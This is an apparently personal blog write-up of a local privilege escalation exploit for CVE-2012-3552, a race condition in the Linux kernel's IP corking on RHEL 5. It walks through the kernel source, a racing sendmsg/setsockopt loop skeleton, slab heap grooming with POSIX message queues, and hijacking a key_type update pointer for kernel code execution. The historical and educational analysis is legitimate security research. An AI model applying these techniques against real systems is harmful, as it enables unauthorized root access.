Exploiting CVE-2012-3552: Race condition in Linux kernel IP corking

2022-04-02

This is a brief walk-through of an old exploit I wrote for CVE-2012-3552. I've had these notes floating around for a long time but finally took the time to write them up properly. The exploit was targeting a RHEL 5 kernel, which is now ancient. Many, many exploitation mitigations have been added to the kernel since then, so a lot of the techniques used here no longer work. The overview of successfully exploiting the narrow race condition is, hopefully, still interesting.

The fix

Commit f6d8bd051c391c1c0458a30b2a7abcd939329259 patched the vulnerability:

inet: add RCU protection to inet->opt

We lack proper synchronization to manipulate inet->opt ip_options

Problem is ip_make_skb() calls ip_setup_cork() and ip_setup_cork() possibly makes a copy of ipc->opt (struct ip_options), without any protection against another thread manipulating inet->opt.

Another thread can change inet->opt pointer and free old one under us.

Use RCU to protect inet->opt (changed to inet->inet_opt).

The opt member of struct inet_sock represents IP options associated with a socket. As the patch description explains, there was no synchronization around the opt field which can be used to possibly trigger a use after free.

The CVE description mentions that this vulnerability might be triggered remotely. This may be possible — I didn't fully investigate that claim — but I was more interested in leveraged the bug for a local privilege escalation.

The vulnerability

We reach ip_setup_cork in the kernel by passing the MSG_MORE option to the sendmsg syscall. This sets up corking for a UDP socket:

net/ipv4/ip_output.c

static int ip_setup_cork(struct sock *sk, struct inet_cork *cork,
                         struct ipcm_cookie *ipc, struct rtable **rtp)
{
        struct inet_sock *inet = inet_sk(sk);
        struct ip_options *opt;
        struct rtable *rt;

        /*
         * setup for corking.
         */
        opt = ipc->opt;
        if (opt) {
                if (cork->opt == NULL) {                                                (1)
                        cork->opt = kmalloc(sizeof(struct ip_options) + 40,             (2)
                                            sk->sk_allocation);
                        if (unlikely(cork->opt == NULL))
                                return -ENOBUFS;
                }
                memcpy(cork->opt, opt, sizeof(struct ip_options) + opt->optlen);        (3)
                cork->flags |= IPCORK_OPT;
                cork->addr = ipc->addr;
        }
        ...

When the kernel sets up corking for a socket, it makes a copy of the IP options. If no IP options have previously been set for corking (1), we allocate a new buffer to hold the options (2), then copy the current options into the newly allocated buffer (3). Unfortunately, there is no synchronization around the opt pointer: another kernel thread may free opt in between (2) and (3) which causes the use after free.

We can use this use after free to trigger memory corruption. In (3), the opt->optlen field is used to determine the length of the options to copy. By setting a large value of opt->optlen, we can cause a heap buffer overflow. But can we win the race condition? Can we precisely control the heap layout to overwrite something important and gain root? Let's find out!

Triggering the overflow

The existing IP options for a socket can be replaced by calling setsockopt with the IP_OPTIONS option. After setting the new IP options (4), the existing IP options are freed (5):

net/ipv4/ip_sockglue.c

static int do_ip_setsockopt(struct sock *sk, int level,
                            int optname, char __user *optval, unsigned int optlen)
{
        ...
        switch (optname) {
        case IP_OPTIONS:
        {
                struct ip_options *opt = NULL;
                if (optlen > 40 || optlen < 0)
                        goto e_inval;
                err = ip_options_get_from_user(sock_net(sk), &opt,
                                               optval, optlen);                (4)
                if (err)
                        break;
                if (inet->is_icsk) {
                        ...
                }
                opt = xchg(&inet->opt, opt);
                kfree(opt);                                                    (5)
                break;
        }
        ...
}

The basic outline of our exploit will use two userspace threads calling sendmsg and setsockopt repeatedly on the same socket:

#define ITERATIONS 100000

static void pin_to_cpu(unsigned long cpu) {
        unsigned long cpumask = 1 << cpu;
        unsigned int cpumasklen = sizeof(cpumask);

        if(sched_setaffinity(0, cpumasklen, &cpumask)) {
                perror("sched_setaffinity");
                exit(1);
        }
}

int child(int exploit_sock) {
    pin_to_cpu(1);
    ...
    for(i = 0; i < ITERATIONS; i++) {
        /* Send with no flags, clear the queue */
        sendmsg(exploit_sock, &hdr, 0);

        /*
         * MSG_MORE implies corking which will copy the IP options
         * MSG_CONFIRM makes the race window slightly large
         */
        sendmsg(exploit_sock, &hdr, MSG_MORE | MSG_CONFIRM);
    }
}

int parent(int exploit_sock) {
    pin_to_cpu(0);
    ...
    for(i = 0; i < ITERATIONS; i++) {
        /*
         * Replace current options, if we win the race
         * the original IP options have been free'd
         */
        setsockopt(exploit_sock, IPPROTO_IP, IP_OPTIONS, &options, sizeof(options));
    }
}

The exploit aims to achieve this interleaving of events in kernelspace to trigger the overflow:

parent (CPU 0)                  |   child (CPU 1)
--------------------------------|--------------------------------
                                |   /* ip_setup_cork:
                                |    * set up IP options
                                |    * for corked message
                                |    */
                                |   cork->opt = kmalloc(
                                |     sizeof(struct ip_options) + 40,
                                |     sk->sk_allocation
                                |   );
                                |
/* do_ip_setsockopt:            |
 * free IP options and          |
 * create hole in the heap      |
 */                             |
ip_options_get_from_user(       |
  sock_net(sk),                 |
  &opt,                         |
  optval,                       |
  optlen                        |
);                              |
...                             |
xchg(                           |
  &inet->opt,                   |
  opt                           |
);                              |
                                |
                                |
/* TODO: trigger another kernel |
 * allocation to overwrite      |
 * `opt` with an invalid        |
 * `->optlen` field             |
 */                             |
                                |
                                |    /* ip_setup_cork:
                                |     * malformed IP options
                                |     * triggers overflow
                                |     */
                                |    memcpy(
                                |      cork->opt,
                                |      opt,
                                |      sizeof(struct ip_options)
                                |        + opt->optlen
                                |    );

We use sched_setaffinity(2) to hint to the kernel that these two threads should run on different CPU cores. This helps in two ways:

we increase the chance that ip_setup_cork and do_ip_setsockopt run concurrently
we gain greater control over the layout of the kernel heap. The kernel allocated uses a number of per-CPU caches that influence the behavior of kmalloc and kfree.

Even with pinning threads to separate CPUs, I needed ~100,000 iterations on my test machine to reliably trigger the use after free and subsequent memory corruption.

Using the overflow

The target kernel uses the SLAB allocator which influences how kmalloc and kfree behave. The SLAB allocator aims to reduce fragmentation caused by different sized allocations being serviced from a single heap. A number of caches are defined which service allocations for common types, e.g. struct task_struct, struct mm_struct, etc.

There are also a number of general-purpose caches used for generic allocations, e.g. the size-32, size-64 and size-128 caches contain allocations up to 32-, 64- and 128-bytes respectively. SLAB allocation is also CPU efficient because, as each allocation in a specific cache is the same size, there is no need to maintain complex metadata for each allocation. Instead, allocation metadata is stored at the beginning of the slab and there is no metadata between individual allocations. This simplifies our exploit as we don't need to worry about corrupting any heap metadata.

Here is a rough sketch of how we want to use this overflow. First we'll groom the kernel heap to place our exploit data (AAAA) and victim allocation in the size-64 cache, both preceded by a free block (....).

The heap will look like this, initially:

- - --+------------+------------+-- - - - --+------------+------------+-- - -
      |    ....    | AAAAAAAAAA |           |    ....    |   victim   |
      |    ....    | AAAAAAAAAA |           |    ....    | allocation |
- - --+------------+------------+-- - - - --+------------+------------+-- - -

We will then use setsockopt to place an ip_options structure in one of the free blocks:

- - --+------------+------------+-- - - - --+------------+------------+-- - -
      |    opt     | AAAAAAAAAA |           |    ....    |   victim   |
      |            | AAAAAAAAAA |           |    ....    | allocation |
- - --+------------+------------+-- - - - --+------------+------------+-- - -

By starting corking on an existing socket, a new ip_options structure (cork->opt from ip_setup_cork) will be allocated in the free block preceding our victim allocation:

- - --+------------+------------+-- - - - --+------------+------------+-- - -
      |    opt     | AAAAAAAAAA |           |   cork->   |   victim   |
      |            | AAAAAAAAAA |           |    opt     | allocation |
- - --+------------+------------+-- - - - --+------------+------------+-- - -

Use the IP_OPTIONS socket option to free the existing opt structure:

- - --+------------+------------+-- - - - --+------------+------------+-- - -
      |    ....    | AAAAAAAAAA |           |   cork->   |   victim   |
      |    ....    | AAAAAAAAAA |           |    opt     | allocation |
- - --+------------+------------+-- - - - --+------------+------------+-- - -

Next, we trigger any syscall which allows us to allocate a buffer in the size-64 cache. When interpreted as an ip_options structure, this allocation will have an invalid length field:

- - --+------------+------------+-- - - - --+------------+------------+-- - -
      |    fake    | AAAAAAAAAA |           |   cork->   |   victim   |
      |    opt     | AAAAAAAAAA |           |    opt     | allocation |
- - --+------------+------------+-- - - - --+------------+------------+-- - -

The memcpy in ip_setup_cork runs, using the invalid length field and overwriting both the cork->opt allocation and the victim allocation:

- - --+------------+------------+-- - - - --+------------+------------+-- - -
      |    fake    | AAAAAAAAAA |           |    fake    | AAAAAAAAAA |
      |    opt     | AAAAAAAAAA |           |    opt     | AAAAAAAAAA |
- - --+------------+------------+-- - - - --+------------+------------+-- - -

This sketch, obviously, requires a lot of heap grooming which we'll come back to later.

Controlling the overflow

We now need two things to put the exploit together:

a method of allocating a fake ip_options structure in the size-64 cache which allows us to control the ->len field
a victim allocation that will give us privileges when overwritten.

The fake `ip_options` structure

To allocate the fake ip_options structure in the size-64 cache, we need a kernel allocation between 33 and 64 bytes that we can trigger from userspace without many restrictions on the contents of the allocation. There are many different ways to do this, but I settled on the IP_MSFILTER option to setsockopt. This option controls multicast source filtering:

net/ipv4/ip_sockglue.c

        case IP_MSFILTER:
        {
                struct ip_msfilter *msf;
                ...
                msf = kmalloc(optlen, GFP_KERNEL);                    (6)
                if (!msf) {
                        err = -ENOBUFS;
                        break;
                }
                err = -EFAULT;
                if (copy_from_user(msf, optval, optlen)) {            (7)
                        kfree(msf);
                        break;
                }
                /* numsrc >= (1G-4) overflow in 32 bits */
                if (msf->imsf_numsrc >= 0x3ffffffcU ||
                    msf->imsf_numsrc > sysctl_igmp_max_msf) {
                        kfree(msf);                                   (8)
                        err = -ENOBUFS;
                        break;
                }
                ...
        }

It allows us to allocate memory of an arbitrary size (6), copy our data into the allocation (7) then immediately free it (8) by failing some basic validation. Apart from the limitation on the ismsf_numsrc field needed to trigger the error path, there is no limit on the contents of our allocation.

The victim allocation

We are looking for something that is allocated on the size-64 cache and contains something useful to us when overwritten, e.g. a function pointer or pointer to data. The allocation also needs to be allocatable on demand so we can easily arrange the heap.

I settled on the thread_group_cred structure for this exploit. The structure represents generic "credentials" for a process, including things like cryptographic keys and authentication tokens, that can be accessed via the add_key, request_key and keyctl syscalls. The structure is allocated when forking a new process so it is easy for us to allocate it on demand.

include/linux/cred.h

struct thread_group_cred {
        atomic_t               usage;
        pid_t                  tgid;                        /* thread group process ID */
        spinlock_t             lock;
        struct key             *session_keyring;        /* keyring inherited over fork */
        struct key             *process_keyring;        /* keyring private to this process */
        struct rcu_head        rcu;                        /* RCU deletion hook */
};

The process_keyring and session_keyring members point to key structures:

include/linux/key.h

struct key {
        atomic_t               usage;                /* number of references */
        key_serial_t           serial;               /* key serial number */
        struct rb_node         serial_node;
        struct key_type        *type;                /* type of key */
        ...
};

The credential infrastructure in the kernel is fairly generic and the exact implementation is determined by the struct key_type containing a table of function pointers:

include/linux/key-type.h

struct key_type {
        /* name of the type */
        const char *name;

        size_t def_datalen;

        int (*instantiate)(struct key *key, const void *data, size_t datalen);
        int (*update)(struct key *key, const void *data, size_t datalen);
        ...
};

The keyctl syscall allows a process to perform several generic operations on the current process's credentials which are implemented by the type table of function pointers. In our exploit we can use the KEYCTL_UPDATE flag to call through the ->update function pointer (9) to our shellcode:

security/keys/key.c

int key_update(key_ref_t key_ref, const void *payload, size_t plen)
{
        struct key *key = key_ref_to_ptr(key_ref);
        int ret;

        ...

        /* attempt to update it if supported */
        ret = -EOPNOTSUPP;
        if (key->type->update) {
                down_write(&key->sem);

                ret = key->type->update(key, payload, plen);                (9)
                if (ret == 0)
                        /* updating a negative key instantiates it */
                        clear_bit(KEY_FLAG_NEGATIVE, &key->flags);

                up_write(&key->sem);
        }

 error:
        return ret;
}

There are a couple of levels indirection from our overflowed thread_group_cred structure to the update function pointer. We can handle this by constructing a fake key and key_type structures in userspace then overflowing the ->process_keyring field to point back to userspace:

userspace:
                             /--> struct key:
                             |      ...
                             |      type: ----\
                             |      ...       |
                             |                \--> struct key_type:
                             |                       ...
                             |                       update: --------> shellcode
                             |                       ...
                             |
                             |
                             |
-----------------------------+--------------------------------------------------
kernelspace:                 |
                             |
  struct thread_group_cred:  |
    ...                      |
    process_keyring: --------/
    ...

The exploit data

We need another allocation on the size-64 cache which allows us to control the bytes that we overwrite thread_group_creds structure. Of course, there already is a way of allocating on the size-64 cache: IP options! We just need to ensure that we construct a valid IP options buffer that, when interpreted as a thread_group_creds structure, gives us control over the process_keyring field. The raw IP options data passed from userspace is prefixed with the ip_options structure which makes this approach less flexible.

We can use pahole tool to dump out the size and offsets of the fields in the two structures to confirm that the process_keyring member (at offset 24) lies after the prefixed IP options header (12 bytes in total):

struct ip_options {
        __be32                     faddr;                /*     0     4 */
        unsigned char              optlen;               /*     4     1 */
        unsigned char              srr;                  /*     5     1 */
        unsigned char              rr;                   /*     6     1 */
        unsigned char              ts;                   /*     7     1 */
        unsigned char              is_strictroute:1;     /*     8: 0  1 */
        unsigned char              srr_is_hit:1;         /*     8: 1  1 */
        unsigned char              is_changed:1;         /*     8: 2  1 */
        unsigned char              rr_needaddr:1;        /*     8: 3  1 */
        unsigned char              ts_needtime:1;        /*     8: 4  1 */
        unsigned char              ts_needaddr:1;        /*     8: 5  1 */

        /* XXX 2 bits hole, try to pack */

        unsigned char              router_alert;         /*     9     1 */
        unsigned char              cipso;                /*    10     1 */
        unsigned char              __pad2;               /*    11     1 */
        unsigned char              __data[];             /*    12     0 */

        /* size: 12, cachelines: 1, members: 15 */
        /* sum members: 11 */
        /* sum bitfield members: 6 bits, bit holes: 1, sum bit holes: 2 bits */
        /* last cacheline: 12 bytes */
};

struct thread_group_cred {
        atomic_t                   usage;                /*     0     4 */
        pid_t                      tgid;                 /*     4     4 */
        spinlock_t                 lock;                 /*     8     4 */

        /* XXX 4 bytes hole, try to pack */

        struct key *               session_keyring;      /*    16     8 */
        struct key *               process_keyring;      /*    24     8 */
        struct rcu_head            rcu;                  /*    32    16 */

        /* size: 48, cachelines: 1, members: 6 */
        /* sum members: 44, holes: 1, sum holes: 4 */
        /* last cacheline: 48 bytes */
};

We just need to find an IP option that gives us flexible control from offset 12 through 64. The IP_OPTIONS socket option is handled by ip_options_compile and there is, by design, very little validation of a IPOPT_RA ("Router Alert") field.

net/ipv4/ip_options.c

int ip_options_compile(struct net *net,
                       struct ip_options * opt, struct sk_buff * skb)
{
        ...
        for (l = opt->optlen; l > 0; ) {
                switch (*optptr) {
                      ...
                      case IPOPT_RA:
                        if (optlen < 4) {
                                pp_ptr = optptr + 1;
                                goto error;
                        }
                        if (optptr[2] == 0 && optptr[3] == 0)
                                opt->router_alert = optptr - iph;
                        break;

In diagram form, we can more easily see that the router advertisement gives us control over the two keyring fields:

byte offset:       0       4       8       12      16                  24
thread_group_cred: [usage ][tgid  ][lock  ][...   ][ session_keyring  ][ process_keyring  ]
IP options:        [struct ip_options     ][router advertisment                           ]

We don't directly control the bytes up to offset 12 because of the prefixed ip_options header, so we'll overwrite the usage, tgid and lock fields when triggering the overflow. This didn't seem to have any adverse effect in testing and can be fixed up by our shellcode later.

To summarize our exploit up to now:

we construct a fake key and key_type structure in userspace pointing to our shellcode
we allocate a fake thread_group_cred structure on the kernel heap by attaching a Router Advertisement IP option to an existing socket
we fork a new victim process to allocate our victim thread_group_cred structure on the heap
we arrange the heap so we have the appropriate gaps before the real and fake thread_group_cred structures
we interleave sendmsg and setsockopt to trigger the overflow and overwrite the thread_group_cred structure
finally, the victim process will call keyctl(KEYCTL_UPDATE, ...) to use the corrupted thread_group_cred structure and trigger kernel code execution via the ->update function pointer

Grooming the heap

The whole exploit hinges on our ability to precisely groom the kernel heap. As mentioned, the kernel I'm testing on is using the default SLAB allocator. The SLAB allocator is structured like so:

the allocator uses different caches to service different allocation requests
each individual cache holds items of a specific type (or a specific size, for the generic size-N caches)
a cache is backed by one or more slabs
each slab provides a portion of contiguous memory to allocate objects from, and is prefixed with allocation metadata

In diagram form:

size-32 cache:
|
|   +----------+----+----+----+----+----+----+----+----+----+----+
+-> | metadata |    | .. |    |    | .. | .. | .. |    |    |    |
|   +----------+----+----+----+----+----+----+----+----+----+----+
|
|   +----------+----+----+----+----+----+----+----+----+----+----+
+-> | metadata | .. | .. | .. |    |    |    | .. |    | .. |    |
    +----------+----+----+----+----+----+----+----+----+----+----+

size-64 cache:
|
|   +----------+----+----+----+----+----+----+----+----+----+----+
+-> | metadata |    |    |    |    | .. |    |    |    |    |    |
|   +----------+----+----+----+----+----+----+----+----+----+----+
|
|   +----------+----+----+----+----+----+----+----+----+----+----+
+-> | metadata |    |    | .. |    |    |    | .. |    |    |    |
|   +----------+----+----+----+----+----+----+----+----+----+----+
|
|   +----------+----+----+----+----+----+----+----+----+----+----+
+-> | metadata |    |    |    |    |    |    |    | .. | .. | .. |
    +----------+----+----+----+----+----+----+----+----+----+----+

The slabs become dirty over time — having a mixture of in use and free slots — as different subsystems with differing allocation patterns use the same caches. Our exploit relies on very precise layout of objects on a single slab so these dirty slabs are a problem for us.

Fresh slabs are allocated once all existing slabs have been filled. We can force the creation of a new, clean slab by allocating a large number of objects on the size-64 heap. Once we have a clean slab, the allocation pattern is deterministic on this old RHEL 5 kernel.

Luckily, the target RHEL 5 kernel exposes the /proc/slabinfo file to unprivileged users. This file gives an overview of the current state of the various caches:

$ cat /proc/slabinfo
# name            <active_objs> <num_objs> <objsize> <objperslab> <pagesperslab> : tunables <limit> <batchcount> <sharedfactor> : slabdata <active_slabs> <num_slabs> <sharedavail>
...
size-192             108    120    192   20    1 : tunables  120   60    8 : slabdata      6      6      0
size-128(DMA)          0      0    128   30    1 : tunables  120   60    8 : slabdata      0      0      0
size-128             316    330    128   30    1 : tunables  120   60    8 : slabdata     11     11      0
size-96(DMA)           0      0    128   30    1 : tunables  120   60    8 : slabdata      0      0      0
size-96              598    600    128   30    1 : tunables  120   60    8 : slabdata     20     20      0
size-64(DMA)           0      0     64   59    1 : tunables  120   60    8 : slabdata      0      0      0
size-32(DMA)           0      0     32  113    1 : tunables  120   60    8 : slabdata      0      0      0
size-64             2533   2773     64   59    1 : tunables  120   60    8 : slabdata     47     47      0
size-32            22040  22939     32  113    1 : tunables  120   60    8 : slabdata    203    203      0
kmem_cache           170    180    256   15    1 : tunables  120   60    8 : slabdata     12     12      0
...

By parsing this output while allocating objects in kernelspace, we can infer precisely when a new size-64 slab is allocated.

We now need a method of allocating a large number of objects in the size size-64 cache. Depending on the uptime and load of the system, we may need to make many hundreds of allocations to completely fill the existing slabs. We can use POSIX message queues to do this. POSIX message queues allow a process to send data to another process on the same machine via mq_send(3) and mq_receive(3). If a process attempts to send a message while there is no other process ready to receive the message, then the message is copied into the kernel and placed on a message queue. Messages can be of an arbitrary size and we can choose a specific message length to force allocations to be served from the size-64 cache.

On my test kernel, the number of message queues is limited to a maximum of 256, each containing a maximum of 10 messages. Assuming no existing message queues exist, we can make 256 * 10 = 2560 allocations before reaching these limits. With 59 allocations needed to fill a size-64 slab, this is enough to completely fill 43 slabs. We can increase this number, though, using the priority system for messages.

Messages in each queue can have a priority detailing in what order messages should be received from the queue. Internally messages are sorted by priority with a red-black tree, with each node in the tree being a list of messages with the same priority. Coincidentally, the nodes in the red-black tree are allocated from the size-64 cache. By sending each message with a unique priority, we can construct a red-black tree with 9 nodes containing our 10 messages. This now allows us to trigger (256 * (10 + 9)) = 4864 allocations. This is enough to completely fill 82 size-64 slabs.

For the sake of brevity, I won't go into the full details about how to arrange the new slab in the right layout. Briefly, though, we can groom the precise layout of the fresh slab by sending and receiving 64-byte messages via a POSIX message queue, forking new process to allocate the victim thread_group_cred structure, then allocate our fake thread_group_cred structure using setsockopt.

But what about other processes on the machine? Won't they accidentally interfere with our heap grooming? This is possible but there a couple of things that help us.

Firstly, the /proc/slabinfo output gives very precise information about the number of objects allocated so we can infer if another process has allocated on our slab. This allows us to re-groom the heap before triggering the overflow

Secondly, the SLAB allocator has a number of optimizations for SMP machines that help us precisely control the heap layout. When a slab is first allocated, a number of items (cachep->num) are reserved on the per-CPU LIFO (ac->entry) via cache_alloc_refill (10):

mm/slab.c

static void *cache_alloc_refill(struct kmem_cache *cachep, gfp_t flags)
{
        struct array_cache *ac = cpu_cache_get(cachep);
        ...
                while (slabp->inuse < cachep->num && batchcount--) {
                        STATS_INC_ALLOCED(cachep);
                        STATS_INC_ACTIVE(cachep);
                        STATS_SET_HIGH(cachep);

                        ac->entry[ac->avail++] = slab_get_obj(cachep, slabp,        (10)
                                                            node);
                }
        ...
}

When objects are allocated from this cache, they are pulled from the per-CPU LIFO if available (11):

mm/slab.c

static inline void *____cache_alloc(struct kmem_cache *cachep, gfp_t flags)
{
        void *objp;
        struct array_cache *ac;

        check_irq_off();

        ac = cpu_cache_get(cachep);
        if (likely(ac->avail)) {
                STATS_INC_ALLOCHIT(cachep);
                ac->touched = 1;
                objp = ac->entry[--ac->avail];                                        (11)
        } else {
                ...

And when an object is freed, it is placed back on the per-CPU LIFO (12):

mm/slab.c

static inline void __cache_free(struct kmem_cache *cachep, void *objp,
    void *caller)
{
        struct array_cache *ac = cpu_cache_get(cachep);
        ...
        if (likely(ac->avail < ac->limit)) {
                STATS_INC_FREEHIT(cachep);
        } else {
                STATS_INC_FREEMISS(cachep);
                cache_flusharray(cachep, ac);
        }

        ac->entry[ac->avail++] = objp;                                                (12)
}

This is done for performance reasons but it actually helps our exploit because the beginning of the newly created slab is reserved for servicing allocations from the current CPU. Because we have previously pinned our exploit threads to specific CPUs, we have a higher chance of allocating objects from this piece of contiguous memory at the beginning of the slab. As our exploit threads run in a tight loop constantly allocating and freeing objects via setsockopt and sendmsg, this LIFO cache also helps us ensure that the same objects are allocated for each iteration of the respective loops.

All that being said, the exploit is not 100% stable because we are at the mercy of sched_setaffinity(2) correctly pinning our exploit threads to specific CPUs. This is not guaranteed; the setting is merely a hint to the kernel. Also, other processes on the same machine may allocate on the size-64 cache. The /proc/slabinfo output, though, gives us fairly good visibility into the state of the size-64 cache and we can abort the exploit attempt if we detect any unexpected allocations.

The final exploit

Putting it all together, our exploit first grooms the kernel heap using POSIX message queues and sets up a specific pattern of allocations on the newly allocated slab. We then run our exploit threads until we trigger this specific sequence of events in kernelspace:

parent (CPU 0)                  |   child (CPU 1)
                                |   /* ip_setup_cork:
                                |    * set up IP options
                                |    * for corked message
                                |    */
                                |   cork->opt = kmalloc(
                                |     sizeof(struct ip_options) + 40,
                                |     sk->sk_allocation
                                |   );
                                |
/* do_ip_setsockopt:            |
 * free IP options and          |
 * create hold in the heap      |
 */                             |
ip_options_get_from_user(       |
  sock_net(sk),                 |
  &opt,                         |
  optval,                       |
  optlen                        |
);                              |
...                             |
xchg(                           |
  &inet->opt,                   |
  opt                           |
);                              |
                                |
                                |
/* do_ip_setsockopt:            |
 * immeadiately fill hole       |
 * with malformed IP options    |
 */                             |
msf = kmalloc(                  |
  optlen,                       |
  GFP_KERNEL                    |
);                              |
...                             |
copy_from_user(                 |
  msf,                          |
  optval,                       |
  optlen                        |
)                               |
                                |    /* ip_setup_cork:
                                |     * malformed IP options
                                |     * triggers overflow into
                                |     * key structure
                                |     */
                                |    memcpy(
                                |      cork->opt,
                                |      opt,
                                |      sizeof(struct ip_options)
                                |        + opt->optlen
                                |    );
                                |
                                |
                                |
                                |    /*
                                |     * trigger execution via
                                |     * corrupted key structure
                                |     * with keyctl(KEYCTL_UPDATE)
                                |     */
                                |    key->type->update(
                                |      key,
                                |      payload,
                                |      plen
                                |    );

🍨

Exploiting CVE-2012-3552: Race condition in Linux kernel IP corking

The fix

The vulnerability

net/ipv4/ip_output.c

Triggering the overflow

net/ipv4/ip_sockglue.c

Using the overflow

Controlling the overflow

The fake ip_options structure

net/ipv4/ip_sockglue.c

The victim allocation

include/linux/cred.h

include/linux/key.h

include/linux/key-type.h

security/keys/key.c

The exploit data

net/ipv4/ip_options.c

Grooming the heap

mm/slab.c

mm/slab.c

mm/slab.c

The final exploit

The fake `ip_options` structure